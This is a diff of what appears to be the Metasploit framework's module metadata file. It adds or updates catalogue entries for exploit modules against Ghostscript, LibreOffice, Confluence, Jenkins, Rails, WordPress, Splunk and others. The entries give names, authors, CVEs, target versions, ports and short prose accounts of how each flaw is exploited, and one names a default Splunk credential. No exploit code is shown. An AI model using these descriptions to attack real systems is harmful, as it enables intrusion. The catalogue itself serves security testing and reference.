-    "description": "This module exploits a -dSAFER bypass in Ghostscript to execute\n        arbitrary commands by handling a failed restore (grestore) in\n        PostScript to disable LockSafetyParams and avoid invalidaccess.\n\n        This vulnerability is reachable via libraries such as ImageMagick,\n        and this module provides the latest vector for Ghostscript.\n\n        For previous Ghostscript vectors, please see the following modules:\n          exploit/unix/fileformat/ghostscript_type_confusion\n          exploit/unix/fileformat/imagemagick_delegate",
+    "description": "This module exploits a -dSAFER bypass in Ghostscript to execute\n        arbitrary commands by handling a failed restore (grestore) in\n        PostScript to disable LockSafetyParams and avoid invalidaccess.\n\n        This vulnerability is reachable via libraries such as ImageMagick.",
    "references": [
      "CVE-2018-16509",
      "URL-https://seclists.org/oss-sec/2018/q3/142",
@@ -57234,7 +58366,7 @@
      "PowerShell (In-Memory)",
      "Linux (Dropper)"
    ],
-    "mod_time": "2018-11-16 12:18:28 +0000",
+    "mod_time": "2019-04-24 11:34:42 +0000",
    "path": "/modules/exploits/multi/fileformat/ghostscript_failed_restore.rb",
    "is_install_path": true,
    "ref_name": "multi/fileformat/ghostscript_failed_restore",
@@ -57242,6 +58374,10 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "RelatedModules": [
+        "exploit/unix/fileformat/ghostscript_type_confusion",
+        "exploit/unix/fileformat/imagemagick_delegate"
+      ]
    }
  },
  "exploit_multi/fileformat/js_unpacker_eval_injection": {
@@ -57279,6 +58415,44 @@
    "notes": {
    }
  },
+  "exploit_multi/fileformat/libreoffice_macro_exec": {
+    "name": "LibreOffice Macro Code Execution",
+    "full_name": "exploit/multi/fileformat/libreoffice_macro_exec",
+    "rank": 300,
+    "disclosure_date": "2018-10-18",
+    "type": "exploit",
+    "author": [
+      "Alex Inführ",
+      "Shelby Pace"
+    ],
+    "description": "LibreOffice comes bundled with sample macros written in Python and\n        allows the ability to bind program events to them. A macro can be tied\n        to a program event by including the script that contains the macro and\n        the function name to be executed. Additionally, a directory traversal\n        vulnerability exists in the component that references the Python script\n        to be executed. This allows a program event to execute functions from Python\n        scripts relative to the path of the samples macros folder. The pydoc.py script\n        included with LibreOffice contains the tempfilepager function that passes\n        arguments to os.system, allowing RCE.\n\n        This module generates an ODT file with a mouse over event that\n        when triggered, will execute arbitrary code.",
+    "references": [
+      "CVE-2018-16858",
+      "URL-https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html"
+    ],
+    "platform": "Linux,Windows",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows",
+      "Linux"
+    ],
+    "mod_time": "2019-04-17 08:29:58 +0000",
+    "path": "/modules/exploits/multi/fileformat/libreoffice_macro_exec.rb",
+    "is_install_path": true,
+    "ref_name": "multi/fileformat/libreoffice_macro_exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "exploit_multi/fileformat/maple_maplet": {
    "name": "Maple Maplet File Creation and Command Execution",
    "full_name": "exploit/multi/fileformat/maple_maplet",
@@ -57860,7 +59034,7 @@
      "Apache Jetspeed <= 2.3.0 (Linux)",
      "Apache Jetspeed <= 2.3.0 (Windows)"
    ],
-    "mod_time": "2018-11-16 12:18:28 +0000",
+    "mod_time": "2019-02-25 11:32:06 +0000",
    "path": "/modules/exploits/multi/http/apache_jetspeed_file_upload.rb",
    "is_install_path": true,
    "ref_name": "multi/http/apache_jetspeed_file_upload",
@@ -58442,6 +59616,55 @@
    "notes": {
    }
  },
+  "exploit_multi/http/cmsms_showtime2_rce": {
+    "name": "CMS Made Simple (CMSMS) Showtime2 File Upload RCE",
+    "full_name": "exploit/multi/http/cmsms_showtime2_rce",
+    "rank": 300,
+    "disclosure_date": "2019-03-11",
+    "type": "exploit",
+    "author": [
+      "Daniele Scanu",
+      "Fabio Cogno"
+    ],
+    "description": "This module exploits a File Upload vulnerability that lead in a RCE in\n        Showtime2 module (<= 3.6.2) in CMS Made Simple (CMSMS). An authenticated\n        user with \"Use Showtime2\" privilege could exploit the vulnerability.\n\n        The vulnerability exists in the Showtime2 module, where the class\n        \"class.showtime2_image.php\" does not ensure that a watermark file\n        has a standard image file extension (GIF, JPG, JPEG, or PNG).\n\n        Tested on Showtime2 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0,\n        3.4.5, 3.4.3, 3.4.2 on CMS Made Simple (CMSMS) 2.2.9.1",
+    "references": [
+      "CVE-2019-9692",
+      "CWE-434",
+      "EDB-46546",
+      "URL-https://forum.cmsmadesimple.org/viewtopic.php?f=1&t=80285",
+      "URL-http://viewsvn.cmsmadesimple.org/diff.php?repname=showtime2&path=%2Ftrunk%2Flib%2Fclass.showtime2_image.php&rev=47"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2019-03-27 15:17:32 +0000",
+    "path": "/modules/exploits/multi/http/cmsms_showtime2_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/cmsms_showtime2_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "exploit_multi/http/cmsms_upload_rename_rce": {
    "name": "CMS Made Simple Authenticated RCE via File Upload/Copy",
    "full_name": "exploit/multi/http/cmsms_upload_rename_rce",
@@ -58586,6 +59809,56 @@
    "notes": {
    }
  },
+  "exploit_multi/http/confluence_widget_connector": {
+    "name": "Atlassian Confluence Widget Connector Macro Velocity Template Injection",
+    "full_name": "exploit/multi/http/confluence_widget_connector",
+    "rank": 600,
+    "disclosure_date": "2019-03-25",
+    "type": "exploit",
+    "author": [
+      "Daniil Dmitriev",
+      "Dmitry (rrock) Shchannikov"
+    ],
+    "description": "Widget Connector Macro is part of Atlassian Confluence Server and Data Center that\n        allows embed online videos, slideshows, photostreams and more directly into page.\n        A _template parameter can be used to inject remote Java code into a Velocity template,\n        and gain code execution. Authentication is unrequired to exploit this vulnerability.\n        By default, Java payload will be used because it is cross-platform, but you can also\n        specify which native payload you want (Linux or Windows).\n\n        Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version\n        6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected.\n\n        This vulnerability was originally discovered by Daniil Dmitriev\n        https://twitter.com/ddv_ua.",
+    "references": [
+      "CVE-2019-3396",
+      "URL-https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html",
+      "URL-https://chybeta.github.io/2019/04/06/Analysis-for-%E3%80%90CVE-2019-3396%E3%80%91-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/",
+      "URL-https://paper.seebug.org/886/"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 8090,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Java",
+      "Windows",
+      "Linux"
+    ],
+    "mod_time": "2019-04-19 12:35:36 +0000",
+    "path": "/modules/exploits/multi/http/confluence_widget_connector.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/confluence_widget_connector",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "exploit_multi/http/cups_bash_env_exec": {
    "name": "CUPS Filter Bash Environment Variable Code Injection (Shellshock)",
    "full_name": "exploit/multi/http/cups_bash_env_exec",
@@ -59067,6 +60340,51 @@
    "notes": {
    }
  },
+  "exploit_multi/http/getsimplecms_unauth_code_exec": {
+    "name": "GetSimpleCMS Unauthenticated RCE",
+    "full_name": "exploit/multi/http/getsimplecms_unauth_code_exec",
+    "rank": 600,
+    "disclosure_date": "2019-04-28",
+    "type": "exploit",
+    "author": [
+      "truerand0m"
+    ],
+    "description": "This module exploits a vulnerability found in GetSimpleCMS,\n        which allows unauthenticated attackers to perform Remote Code Execution.\n        An arbitrary file upload (PHPcode for example) vulnerability can be triggered by an authenticated user,\n        however authentication can be bypassed by leaking the cms API key to target the session manager.",
+    "references": [
+      "CVE-2019-11231",
+      "URL-https://ssd-disclosure.com/archives/3899/ssd-advisory-getcms-unauthenticated-remote-code-execution"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "GetSimpleCMS 3.3.15 and before"
+    ],
+    "mod_time": "2019-05-15 15:40:27 +0000",
+    "path": "/modules/exploits/multi/http/getsimplecms_unauth_code_exec.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/getsimplecms_unauth_code_exec",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "exploit_multi/http/git_client_command_exec": {
    "name": "Malicious Git and Mercurial HTTP Server For CVE-2014-9390",
    "full_name": "exploit/multi/http/git_client_command_exec",
@@ -59118,7 +60436,7 @@
    "disclosure_date": "2017-08-10",
    "type": "exploit",
    "author": [
-
+      "timwr"
    ],
    "description": "This module exploits CVE-2017-1000117, which affects Git\n          version 2.7.5 and lower. A submodule of the form 'ssh://' can be passed\n          parameters from the username incorrectly. This can be used to inject\n          commands to the operating system when the submodule is cloned.\n\n          This module creates a fake git repository which contains a submodule\n          containing the vulnerability. The vulnerability is triggered when the\n          submodules are initialised.",
    "references": [
@@ -59137,7 +60455,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2018-10-18 11:24:54 +0000",
+    "mod_time": "2019-03-29 10:44:58 +0000",
    "path": "/modules/exploits/multi/http/git_submodule_command_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/git_submodule_command_exec",
@@ -59154,7 +60472,7 @@
    "disclosure_date": "2018-10-05",
    "type": "exploit",
    "author": [
-
+      "timwr"
    ],
    "description": "This module exploits CVE-2018-17456, which affects Git\n          versions 2.14.5, 2.15.3, 2.16.5, 2.17.2, 2.18.1, and 2.19.1 and lower.\n\n          When a submodule url which starts with a dash e.g \"-u./payload\" is passed\n          as an argument to git clone, the file \"payload\" inside the repository\n          is executed.\n\n          This module creates a fake git repository which contains a submodule\n          containing the vulnerability. The vulnerability is triggered when the\n          submodules are initialised (e.g git clone --recurse-submodules URL)",
    "references": [
@@ -59175,7 +60493,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2018-11-14 10:57:36 +0000",
+    "mod_time": "2019-03-29 10:44:58 +0000",
    "path": "/modules/exploits/multi/http/git_submodule_url_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/git_submodule_url_exec",
@@ -59467,6 +60785,51 @@
    "notes": {
    }
  },
+  "exploit_multi/http/horde_form_file_upload": {
+    "name": "Horde Form File Upload Vulnerability",
+    "full_name": "exploit/multi/http/horde_form_file_upload",
+    "rank": 600,
+    "disclosure_date": "2019-03-24",
+    "type": "exploit",
+    "author": [
+      "Ratiosec"
+    ],
+    "description": "Horde Groupware Webmail contains a flaw that allows an authenticated remote\n          attacker to execute arbitrary PHP code. The exploitation requires the Turba\n          subcomponent to be installed.\n\n          This module was tested on Horde versions 5.2.22 and 5.2.17 running Horde Form subcomponent < 2.0.19.",
+    "references": [
+      "CVE-2019-9858",
+      "URL-https://www.ratiosec.com/2019/horde-groupware-webmail-authenticated-arbitrary-file-injection-to-rce/"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2019-04-09 13:43:54 +0000",
+    "path": "/modules/exploits/multi/http/horde_form_file_upload.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/horde_form_file_upload",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "exploit_multi/http/horde_href_backdoor": {
    "name": "Horde 3.3.12 Backdoor Arbitrary PHP Code Execution",
    "full_name": "exploit/multi/http/horde_href_backdoor",
@@ -60067,6 +61430,76 @@
    "notes": {
    }
  },
+  "exploit_multi/http/jenkins_metaprogramming": {
+    "name": "Jenkins ACL Bypass and Metaprogramming RCE",
+    "full_name": "exploit/multi/http/jenkins_metaprogramming",
+    "rank": 600,
+    "disclosure_date": "2019-01-08",
+    "type": "exploit",
+    "author": [
+      "Orange Tsai",
+      "Mikhail Egorov",
+      "George Noseevich",
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module exploits a vulnerability in Jenkins dynamic routing to\n        bypass the Overall/Read ACL and leverage Groovy metaprogramming to\n        download and execute a malicious JAR file.\n\n        When the \"Java Dropper\" target is selected, the original entry point\n        based on classLoader.parseClass is used, which requires the use of\n        Groovy metaprogramming to achieve RCE.\n\n        When the \"Unix In-Memory\" target is selected, a newer, higher-level,\n        and more universal entry point based on GroovyShell.parse is used.\n        This permits the use of in-memory arbitrary command execution.\n\n        The ACL bypass gadget is specific to Jenkins <= 2.137 and will not work\n        on later versions of Jenkins.\n\n        Tested against Jenkins 2.137 and Pipeline: Groovy Plugin 2.61.",
+    "references": [
+      "CVE-2018-1000861",
+      "CVE-2019-1003000",
+      "CVE-2019-1003001",
+      "CVE-2019-1003002",
+      "CVE-2019-1003005",
+      "CVE-2019-1003029",
+      "EDB-46427",
+      "URL-https://jenkins.io/security/advisory/2019-01-08/",
+      "URL-https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html",
+      "URL-https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html",
+      "URL-https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc",
+      "URL-https://twitter.com/orange_8361/status/1126829648552312832",
+      "URL-https://github.com/orangetw/awesome-jenkins-rce-2019"
+    ],
+    "platform": "Java,Unix",
+    "arch": "cmd, java",
+    "rport": 8080,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix In-Memory",
+      "Java Dropper"
+    ],
+    "mod_time": "2019-05-30 00:06:10 +0000",
+    "path": "/modules/exploits/multi/http/jenkins_metaprogramming.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/jenkins_metaprogramming",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    }
+  },
  "exploit_multi/http/jenkins_script_console": {
    "name": "Jenkins-CI Script-Console Java Execution",
    "full_name": "exploit/multi/http/jenkins_script_console",
@@ -60263,7 +61696,7 @@
    "targets": [
      "Java Universal"
    ],
-    "mod_time": "2018-11-13 15:28:55 +0000",
+    "mod_time": "2019-04-26 11:09:33 +0000",
    "path": "/modules/exploits/multi/http/jira_plugin_upload.rb",
    "is_install_path": true,
    "ref_name": "multi/http/jira_plugin_upload",
@@ -61225,7 +62658,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-05-10 14:02:01 +0000",
    "path": "/modules/exploits/multi/http/moodle_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/moodle_cmd_exec",
@@ -61945,7 +63378,7 @@
      "OATS <= 12.4.0.2.0 (Windows)",
      "OATS <= 12.4.0.2.0 (Linux)"
    ],
-    "mod_time": "2018-11-16 12:18:28 +0000",
+    "mod_time": "2019-02-25 11:35:34 +0000",
    "path": "/modules/exploits/multi/http/oracle_ats_file_upload.rb",
    "is_install_path": true,
    "ref_name": "multi/http/oracle_ats_file_upload",
@@ -62947,6 +64380,54 @@
    "notes": {
    }
  },
+  "exploit_multi/http/pimcore_unserialize_rce": {
+    "name": "Pimcore Unserialize RCE",
+    "full_name": "exploit/multi/http/pimcore_unserialize_rce",
+    "rank": 300,
+    "disclosure_date": "2019-03-11",
+    "type": "exploit",
+    "author": [
+      "Daniele Scanu",
+      "Fabio Cogno"
+    ],
+    "description": "This module exploits a PHP unserialize() in Pimcore before 5.7.1 to\n        execute arbitrary code. An authenticated user with \"classes\" permission\n        could exploit the vulnerability.\n\n        The vulnerability exists in the \"ClassController.php\" class, where the\n        \"bulk-commit\" method makes it possible to exploit the unserialize function\n        when passing untrusted values in \"data\" parameter.\n\n        Tested on Pimcore 5.4.0-5.4.4, 5.5.1-5.5.4, 5.6.0-5.6.6 with the Symfony\n        unserialize payload.\n\n        Tested on Pimcore 4.0.0-4.6.5 with the Zend unserialize payload.",
+    "references": [
+      "CVE-2019-10867",
+      "URL-https://github.com/pimcore/pimcore/commit/38a29e2f4f5f060a73974626952501cee05fda73",
+      "URL-https://snyk.io/vuln/SNYK-PHP-PIMCOREPIMCORE-173998"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Pimcore 5.x (Symfony unserialize payload)",
+      "Pimcore 4.x (Zend unserialize payload)"
+    ],
+    "mod_time": "2019-04-29 08:43:33 +0000",
+    "path": "/modules/exploits/multi/http/pimcore_unserialize_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/pimcore_unserialize_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "exploit_multi/http/playsms_filename_exec": {
    "name": "PlaySMS sendfromfile.php Authenticated \"Filename\" Field Code Execution",
    "full_name": "exploit/multi/http/playsms_filename_exec",
@@ -63366,6 +64847,64 @@
    "notes": {
    }
  },
+  "exploit_multi/http/rails_double_tap": {
+    "name": "Ruby On Rails DoubleTap Development Mode secret_key_base Vulnerability",
+    "full_name": "exploit/multi/http/rails_double_tap",
+    "rank": 600,
+    "disclosure_date": "2019-03-13",
+    "type": "exploit",
+    "author": [
+      "ooooooo_q",
+      "mpgn",
+      "sinn3r <sinn3r@metasploit.com>"
+    ],
+    "description": "This module exploits a vulnerability in Ruby on Rails. In development mode, a Rails\n        application would use its name as the secret_key_base, and can be easily extracted by\n        visiting an invalid resource for a path. As a result, this allows a remote user to\n        create and deliver a signed serialized payload, load it by the application, and gain\n        remote code execution.",
+    "references": [
+      "CVE-2019-5420",
+      "URL-https://hackerone.com/reports/473888",
+      "URL-https://github.com/mpgn/Rails-doubletap-RCE",
+      "URL-https://groups.google.com/forum/#!searchin/rubyonrails-security/CVE-2019-5420/rubyonrails-security/IsQKvDqZdKw/UYgRCJz2CgAJ"
+    ],
+    "platform": "Linux",
+    "arch": "",
+    "rport": 3000,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Ruby on Rails 5.2 and prior"
+    ],
+    "mod_time": "2019-04-30 10:13:01 +0000",
+    "path": "/modules/exploits/multi/http/rails_double_tap.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/rails_double_tap",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "AKA": [
+        "doubletap"
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    }
+  },
  "exploit_multi/http/rails_dynamic_render_code_exec": {
    "name": "Ruby on Rails Dynamic Render File Upload Remote Code Execution",
    "full_name": "exploit/multi/http/rails_dynamic_render_code_exec",
@@ -63702,6 +65241,52 @@
    "notes": {
    }
  },
+  "exploit_multi/http/shopware_createinstancefromnamedarguments_rce": {
+    "name": "Shopware createInstanceFromNamedArguments PHP Object Instantiation RCE",
+    "full_name": "exploit/multi/http/shopware_createinstancefromnamedarguments_rce",
+    "rank": 600,
+    "disclosure_date": "2019-05-09",
+    "type": "exploit",
+    "author": [
+      "Karim Ouerghemmi",
+      "mr_me <steven@srcincite.io>"
+    ],
+    "description": "This module exploits a php object instantiation vulnerability that can lead to RCE in\n        Shopware. An authenticated backend user could exploit the vulnerability.\n\n        The vulnerability exists in the createInstanceFromNamedArguments function, where the code\n        insufficiently performs whitelist check which can be bypassed to trigger an object injection.\n\n        An attacker can leverage this to deserialize an arbitrary payload and write a webshell to\n        the target system, resulting in remote code execution.\n\n        Tested on Shopware git branches 5.6, 5.5, 5.4, 5.3.",
+    "references": [
+      "CVE-2017-18357",
+      "URL-https://blog.ripstech.com/2017/shopware-php-object-instantiation-to-blind-xxe/"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2019-05-17 18:20:59 +0000",
+    "path": "/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/shopware_createinstancefromnamedarguments_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+    }
+  },
  "exploit_multi/http/simple_backdoors_exec": {
    "name": "Simple Backdoor Shell Remote Code Execution",
    "full_name": "exploit/multi/http/simple_backdoors_exec",
@@ -64049,15 +65634,16 @@
      "marcwickenden",
      "sinn3r <sinn3r@metasploit.com>",
      "juan vazquez <juan.vazquez@metasploit.com>",
-      "Gary Blosser"
+      "Gary Blosser",
+      "Matteo Malvica"
    ],
-    "description": "This module exploits a feature of Splunk whereby a custom application can be\n        uploaded through the web based interface. Through the 'script' search command a\n        user can call commands defined in their custom application which includes arbitrary\n        perl or python code. To abuse this behavior, a valid Splunk user with the admin\n        role is required. By default, this module uses the credential of \"admin:changeme\",\n        the default Administrator credential for Splunk. Note that the Splunk web interface\n        runs as SYSTEM on Windows, or as root on Linux by default. This module has been\n        tested successfully against Splunk 5.0, 6.1, and 6.1.1.",
+    "description": "This module exploits a feature of Splunk whereby a custom application can be\n        uploaded through the web based interface. Through the 'script' search command a\n        user can call commands defined in their custom application which includes arbitrary\n        perl or python code. To abuse this behavior, a valid Splunk user with the admin\n        role is required. By default, this module uses the credential of \"admin:changeme\",\n        the default Administrator credential for Splunk. Note that the Splunk web interface\n        runs as SYSTEM on Windows, or as root on Linux by default. This module has been\n        tested successfully against Splunk 5.0, 6.1, 6.1.1 and 7.2.4.\n        Version 7.2.4 has been tested successfully against OSX as well",
    "references": [
      "URL-http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html",
      "URL-http://blog.7elements.co.uk/2012/11/abusing-splunk-with-metasploit.html",
      "URL-http://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Script"
    ],
-    "platform": "Linux,Unix,Windows",
+    "platform": "Linux,OSX,Unix,Windows",
    "arch": "",
    "rport": 8000,
    "autofilter_ports": [
@@ -64077,10 +65663,13 @@
    ],
    "targets": [
      "Automatic",
+      "Splunk >= 7.2.4 / Linux",
+      "Splunk >= 7.2.4 / Windows",
+      "Splunk >= 7.2.4 / OSX",
      "Splunk >= 5.0.1 / Linux",
      "Splunk >= 5.0.1 / Windows"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-19 15:28:24 +0000",
    "path": "/modules/exploits/multi/http/splunk_upload_app_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/splunk_upload_app_exec",
@@ -64373,7 +65962,7 @@
      "Linux (Dropper)",
      "Windows (Dropper)"
    ],
-    "mod_time": "2018-11-16 12:18:28 +0000",
+    "mod_time": "2019-05-20 12:35:52 +0000",
    "path": "/modules/exploits/multi/http/struts2_rest_xstream.rb",
    "is_install_path": true,
    "ref_name": "multi/http/struts2_rest_xstream",
@@ -66039,6 +67628,53 @@
    "notes": {
    }
  },
+  "exploit_multi/http/wp_crop_rce": {
+    "name": "WordPress Crop-image Shell Upload",
+    "full_name": "exploit/multi/http/wp_crop_rce",
+    "rank": 600,
+    "disclosure_date": "2019-02-19",
+    "type": "exploit",
+    "author": [
+      "RIPSTECH Technology",
+      "Wilfried Becard <wilfried.becard@synacktiv.com>"
+    ],
+    "description": "This module exploits a path traversal and a local file inclusion\n          vulnerability on WordPress versions 5.0.0 and <= 4.9.8.\n          The crop-image function allows a user, with at least author privileges,\n          to resize an image and perform a path traversal by changing the _wp_attached_file\n          reference during the upload. The second part of the exploit will include\n          this image in the current theme by changing the _wp_page_template attribute\n          when creating a post.\n\n          This exploit module only works for Unix-based systems currently.",
+    "references": [
+      "CVE-2019-8942",
+      "CVE-2019-8943",
+      "URL-https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "WordPress"
+    ],
+    "mod_time": "2019-04-04 15:19:58 +0000",
+    "path": "/modules/exploits/multi/http/wp_crop_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/wp_crop_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    }
+  },
  "exploit_multi/http/wp_ninja_forms_unauthenticated_file_upload": {
    "name": "WordPress Ninja Forms Unauthenticated File Upload",
    "full_name": "exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload",
@@ -66547,7 +68183,7 @@
    }
  },
  "exploit_multi/local/xorg_x11_suid_server": {
-    "name": "Xorg X11 Server SUID privilege escalation",
+    "name": "Xorg X11 Server SUID logfile Privilege Escalation",
    "full_name": "exploit/multi/local/xorg_x11_suid_server",
    "rank": 400,
    "disclosure_date": "2018-10-25",
@@ -66558,7 +68194,7 @@
      "Aaron Ringo",
      "bcoles <bcoles@gmail.com>"
    ],
-    "description": "This module attempts to gain root privileges with SUID Xorg X11 server\n        versions 1.19.0 < 1.20.3.\n\n        A permission check flaw exists for -modulepath and -logfile options when\n        starting Xorg.  This allows unprivileged users that can start the server\n        the ability to elevate privileges and run arbitrary code under root\n        privileges.\n\n        This module has been tested with OpenBSD 6.3, 6.4, and CentOS 7 (1708).\n        CentOS default install will require console auth for the users session.\n        Cron launches the payload so if Selinux is enforcing exploitation\n        may still be possible, but the module will bail.\n        Xorg must have SUID permissions and may not start if running.\n\n        On exploitation a crontab.old backup file will be created by Xorg.\n        This module will remove the .old file and restore crontab after\n        successful exploitation. Failed exploitation may result in a corrupted\n        crontab. On successful exploitation artifacts will be created consistant\n        with starting Xorg and running a cron.",
+    "description": "This module attempts to gain root privileges with SUID Xorg X11 server\n        versions 1.19.0 < 1.20.3.\n\n        A permission check flaw exists for -modulepath and -logfile options when\n        starting Xorg. This allows unprivileged users that can start the server\n        the ability to elevate privileges and run arbitrary code under root\n        privileges.\n\n        This module has been tested with OpenBSD 6.3, 6.4, CentOS 7.4.1708, and\n        CentOS 7.5.1804, and RHEL 7.5. The default PAM configuration for CentOS\n        and RHEL systems requires console auth for the user's session to start\n        the Xorg server.\n\n        Cron launches the payload, so if SELinux is enforcing, exploitation\n        may still be possible, but the module will bail.\n\n        Xorg must have SUID permissions and may not start if already running.\n\n        On exploitation a crontab.old backup file will be created by Xorg.\n        This module will remove the .old file and restore crontab after\n        successful exploitation. Failed exploitation may result in a corrupted\n        crontab. On successful exploitation artifacts will be created consistant\n        with starting Xorg and running a cron.",
    "references": [
      "CVE-2018-14665",
      "BID-105741",
@@ -66582,7 +68218,7 @@
      "Linux x64",
      "Linux x86"
    ],
-    "mod_time": "2019-01-10 19:19:14 +0000",
+    "mod_time": "2019-04-21 11:21:28 +0000",
    "path": "/modules/exploits/multi/local/xorg_x11_suid_server.rb",
    "is_install_path": true,
    "ref_name": "multi/local/xorg_x11_suid_server",
@@ -66670,6 +68306,43 @@
    "notes": {
    }
  },
+  "exploit_multi/misc/bmc_patrol_cmd_exec": {
+    "name": "BMC Patrol Agent Privilege Escalation Cmd Execution",
+    "full_name": "exploit/multi/misc/bmc_patrol_cmd_exec",
+    "rank": 600,
+    "disclosure_date": "2019-01-17",
+    "type": "exploit",
+    "author": [
+      "b0yd"
+    ],
+    "description": "This module leverages the remote command execution feature provided by\n        the BMC Patrol Agent software. It can also be used to escalate privileges\n        on Windows hosts as the software runs as SYSTEM but only verfies that the password\n        of the provided user is correct. This also means if the software is running on a\n        domain controller, it can be used to escalate from a normal domain user to domain\n        admin as SYSTEM on a DC is DA. **WARNING** The windows version of this exploit uses\n        powershell to execute the payload. The powershell version tends to timeout on\n        the first run so it may take multiple tries.",
+    "references": [
+      "CVE-2018-20735",
+      "URL-https://www.securifera.com/blog/2018/12/17/bmc-patrol-agent-domain-user-to-domain-admin/"
+    ],
+    "platform": "Linux,Windows",
+    "arch": "",
+    "rport": 3181,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows Powershell Injected Shellcode",
+      "Generic Command Callback"
+    ],
+    "mod_time": "2019-03-09 12:22:04 +0000",
